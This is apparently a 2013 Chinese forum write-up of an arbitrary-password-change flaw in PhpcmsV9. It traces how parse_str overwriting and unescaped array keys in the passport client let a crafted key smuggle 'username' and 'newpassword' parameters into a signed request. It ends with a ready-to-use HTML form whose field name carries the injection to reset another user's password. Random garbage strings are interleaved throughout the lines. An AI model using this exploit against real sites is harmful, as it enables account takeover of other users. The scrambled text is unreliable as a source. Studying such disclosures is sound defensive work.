PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发

admin

提到的通行证的代码：
* k- b$ c( }  Q! ?; G' |/ P
5 W& Q7 C8 r: Y' W
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);

在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。
# z% O1 @7 K8 X0 ]" _
我把它留给了你们。
- V" h: o" L! Q3 Y3 b" m不知道你们发现了它没有。

我们知道parse_str类似将http请求转换成php变量的函数，所以，也像http请求在php的环境下一样，如果提交?a=sss&a=aaa，那么a的结果会是aaa，不是sss。

, U8 e" h( c2 m, U- w7 G所以我们知道这个函数有一个问题了，如果后面提交一个内容，它会覆盖前面的。
- r- {" p# D6 Q2 q; ?
也就是
: m+ i7 g- k: z1 X
username=zhangsan&username=lisi的话，那么用户名就不是zhangsan了。

要构造这样的请求，我们还是要回到通行证的client看看，我们有没有这样的机会。
& G- S* M$ \1 M& K+ W* Z, d

其实我们有这样的机会，看看代码，如下：

& `5 P5 M- p; V, X
public function auth_data($data) {
, d9 V  ~; \2 [5 i& h2 \4 |5 g: B                $s = $sep = '';
4 V" u1 M( }  A! T                foreach($data as $k => $v) {
                        if(is_array($v)) {
" s. X4 Y/ e! ^. a% Q0 u6 c0 f                                $s2 = $sep2 = '';
                                foreach($v as $k2 => $v2) {
! c0 Z7 v! H( a9 w6 D# l- q                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
) E% m# }% @3 Q+ X                                        $sep2 = '&';
                                }
  V" F4 \$ |) E. n3 B& ~& B6 Z: Q* s                                $s .= $sep.$s2;
                        } else {
                                $s .= "$sep$k=".$this->_ps_stripslashes($v);
0 C& v! f: @9 O                        }
; Y4 H% W8 `: Y4 _                        $sep = '&';
                }

                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
                return $auth_s;
* [5 j% k0 c7 b8 m. u& F        }

  C) B* |. `  R' o可能我没说明白，对，传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话，那么我就能重写这样的东西。
  X' I. `) @! W
举个例子
5 B6 I: b. M$ {3 [' N
$a[aaa=a&bbb] = 'a';

* X% v( F- q9 ~8 L' s; n5 e& B4 s会变成aaa=a&bbb=a

明白了么，对，就是通过没有注意到的key，我们可以构造出多余的参数来。

这个时候，我们可以再去看一个函数。

就在这个文件内：
$ t' N7 v* \0 q2 _! K
  l, f3 |, ]/ Z- ^+ M8 v
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
  x  F1 Z1 _( l7 J                if($email && !$this->_is_email($email)) {
% Y8 u. A5 c$ V, m7 f6 |# y                        return -4;
. c& n) L# E% e. \) u7 x: [9 P: ^                }
                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
        }

: ]* X8 i1 E* T9 K9 S8 Y这是向通行证发了这样一个请求。
- o. ]% Q' B1 K% K" d' {+ i8 a' S
4 V8 X6 F! F" c, w我们再跟到通信证代码里去看看，就会有所发现。
9 q; {8 D# ?* i, l# L1 K
/ ~5 Q+ [6 C, k5 G' Q; ]
public function edit() {
//能省就省，太长了不是吗？
8 X6 J0 U4 k  @5 d. F
if($this->username) {
//如果提交了用户名，则按照用户名修改记录，反之，按照uid来修改记录。
                                $res = $this->db->update($data, array('username'=>$this->username));
                        } else {
                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);
                                $res = $this->db->update($data, array('uid'=>$this->uid));
                        }
: e: o( M/ D) L& d
* Q# ]9 t( U$ A% W9 I9 Y* W- q好，我们知道了，如果提交了用户名，就会按照用户名来修改记录，不然就按照uid，我们看看函数结构：

public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')

很好，uid要是无法控制的话，后面只剩下一个random了，但是username就在第一个，只要email，password，newpassword，有任何一个可以控制，就可以修改密码了。

我当然找到了：
phpcms9/phpcms/modules/member/index.php

0 H4 c$ j  I5 y) m. w$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
- l8 w7 V% g* R7 _: Q
7 x1 A+ g- u6 E4 N. L' S5 F然后就没有然后了。
9 \1 }5 U: }0 x+ ]
<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">
                                <table width="100%" cellspacing="0" class="table_form">
                                        <tr>
                                                <th width="80">邮箱：</th>        
- `  l1 b: Z$ s                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>
                                        </tr>
                                        <tr>
                                                <th width="80">原密码：</th>        
( |5 {; m4 P& ~; [  N5 e+ a                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
( N$ `& y7 S+ Q                                        </tr>
                                        <tr>
0 ]1 ]- k0 f; [# m  @                                                <th>新密码：</th>
                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
                                        </tr>
                                        <th></th>
7 t4 c( y( P% W6 K6 v- Y: r                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>
                                        </tr>
" q' f) d: p$ Y( r7 m0 Q% |                                </table>

                               
" n* I( N* S" H$ c/ B5 G5 B& ?5 ?                        </form>